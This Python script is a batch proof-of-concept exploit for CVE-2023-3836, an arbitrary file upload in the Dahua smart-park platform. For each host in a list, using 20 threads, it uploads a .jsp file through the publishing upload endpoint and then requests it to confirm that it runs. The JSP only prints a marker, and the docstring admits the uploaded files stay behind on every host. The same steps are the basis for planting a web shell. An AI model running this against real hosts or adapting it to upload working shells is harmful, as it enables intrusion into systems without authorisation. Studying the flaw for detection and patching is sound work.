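"""Batch check for the Dahua smart-park platform "publishing" file upload (CVE-2023-3836).

For every base URL listed in the input file the script:

1. POSTs a multipart form whose ``Filedata`` part carries a ``.jsp`` file
   name to ``/publishing/publishing/material/file/video``;
2. reads ``data.path`` from the JSON reply;
3. GETs ``/publishingImg/<path>`` and looks for the marker ``vultest``.

Notes for whoever runs or reviews this:

* The marker file is NOT removed by the script. Every URL appended to
  ``result.txt`` points at a file that still sits on that host and has to be
  cleaned up separately.
* On the server side the check is visible as a POST to the upload endpoint
  above with a ``.jsp`` file name in the multipart body, followed by a GET
  for a ``.jsp`` under ``/publishingImg/``.
* Certificate verification is switched off (``verify=False``) and the
  matching urllib3 warning is silenced, so replies are not authenticated;
  a positive or negative result can be forged by anything on the path.
"""
import argparse
import json
import textwrap
from multiprocessing.dummy import Pool

import requests
from rich.console import Console

# Silences the InsecureRequestWarning that every verify=False request would emit.
requests.packages.urllib3.disable_warnings()

console = Console()

# Banner text exactly as found in the source; its original multi-line layout
# was already flattened there.
text = """ ██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██████╗ █████╗ ██████╗ ██████╗ ██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗╚════██╗ ╚════██╗██╔══██╗╚════██╗██╔════╝ ██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗█████╔╝╚█████╔╝ █████╔╝███████╗ ██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚═══██╗╚════╝╚═══██╗██╔══██╗ ╚═══██╗██╔═══██╗ ╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗██████╔╝ ██████╔╝╚█████╔╝██████╔╝╚██████╔╝ ╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝╚═════╝ ╚═════╝ ╚════╝ ╚═════╝ ╚═════╝ @version:1.0.0 @author:zt-byte """

# Per-request timeout in seconds, applied to both the upload and the read-back.
REQUEST_TIMEOUT = 4


def current(text):
    """Print *text* as a positive ("vulnerable") result in bold green."""
    console.print(f"[+]{text} 存在漏洞", style="bold green")


def no_current(text):
    """Print *text* as a negative ("not vulnerable") result in bold yellow.

    The original message was a copy of the positive one ("存在漏洞"); it now
    says "不存在漏洞" so the two helpers can no longer be confused.
    """
    console.print(f"[-]{text} 不存在漏洞", style="bold yellow")


def ban(text):
    """Print the banner *text* in bold blue."""
    console.print(text, style="bold blue")


headers = {
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15",
    # The boundary here must stay in sync with the one hard-coded in `data`.
    "Content-Type": "multipart/form-data; boundary=dd8f988919484abab3816881c55272a7",
    "Accept-Encoding": "gzip, deflate",
    "Connection": "close",
}

# Pre-built multipart body: a JSP that only prints the marker "vultest",
# plus two plain form fields ("poc" and "Submit").
data = (
    "--dd8f988919484abab3816881c55272a7\r\n"
    "Content-Disposition: form-data; name=\"Filedata\"; filename=\"0EaE10E7dF5F10C2.jsp\"\r\n"
    "\r\n"
    "<%out.println(\"vultest\");%>\r\n"
    "--dd8f988919484abab3816881c55272a7\r\n"
    "Content-Disposition: form-data; name=\"poc\"\r\n"
    "\r\n"
    "poc\r\n"
    "--dd8f988919484abab3816881c55272a7\r\n"
    "Content-Disposition: form-data; name=\"Submit\"\r\n"
    "\r\n"
    "submit\r\n"
    "--dd8f988919484abab3816881c55272a7--"
)


def poc(url):
    """Check one base URL and report whether the upload marker can be read back.

    Args:
        url: Base URL of the host, without the endpoint path.

    Side effects:
        On a positive result the URL of the uploaded marker file is appended
        to ``result.txt`` and the upload endpoint is printed via ``current``.
        The marker file itself is left on the host (see the module docstring).

    Hosts that cannot be reached, or that answer with something other than
    the expected JSON shape, are skipped without output, as in the original.
    """
    url_end = url + "/publishing/publishing/material/file/video"
    try:
        response = requests.post(
            url_end,
            headers=headers,
            data=data,
            verify=False,  # NOTE(review): TLS verification disabled, reply is unauthenticated
            timeout=REQUEST_TIMEOUT,
        )
        reply = json.loads(response.text)
        path = reply["data"]["path"]
        uploaded_url = url + "/publishingImg/" + path
        # The original read-back had no timeout and could block a worker
        # thread indefinitely; it now uses the same limit as the upload.
        body = requests.get(
            uploaded_url, verify=False, timeout=REQUEST_TIMEOUT
        ).text
    except (requests.RequestException, ValueError, KeyError, TypeError):
        # Connection failure, non-JSON reply, or JSON without data.path:
        # nothing can be concluded about this host.
        return

    if "vultest" not in body:
        no_current(uploaded_url)
        return

    try:
        with open("result.txt", "a", encoding="utf-8") as file:
            file.write(uploaded_url + "\n")
    except OSError as err:
        # Keep the remaining workers running even if the result file is unwritable.
        console.print(f"result.txt: {err}", style="bold red")
    current(url_end)


def op(file):
    """Return the non-empty, whitespace-stripped lines of *file* as a list.

    Blank lines are dropped; the original passed them on as empty URLs,
    which only produced requests that failed and were silently ignored.
    """
    with open(f"{file}", "r", encoding="utf-8") as f:
        return [line.strip() for line in f if line.strip()]


def main():
    """Parse the command line and run `poc` over every listed URL."""
    ban(text)
    parser = argparse.ArgumentParser(
        description='大华智慧园区综合管理平台publishing文件上传poc',
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog=textwrap.dedent(
            '''example: python CVE-2023-3836.py -f ip.txt'''))
    # required=True: without -f the original went on to open a file named
    # "None" and died with a traceback instead of a usage message.
    parser.add_argument("-f", "--file", dest="file", type=str, required=True,
                        help="要查询的url文件,example:urls.txt")
    args = parser.parse_args()
    targets = op(args.file)
    mp = Pool(20)  # 20 worker threads, a value picked by the author
    try:
        mp.map(poc, targets)  # map(function, list of URLs)
    finally:
        mp.close()
        mp.join()


if __name__ == '__main__':
    main()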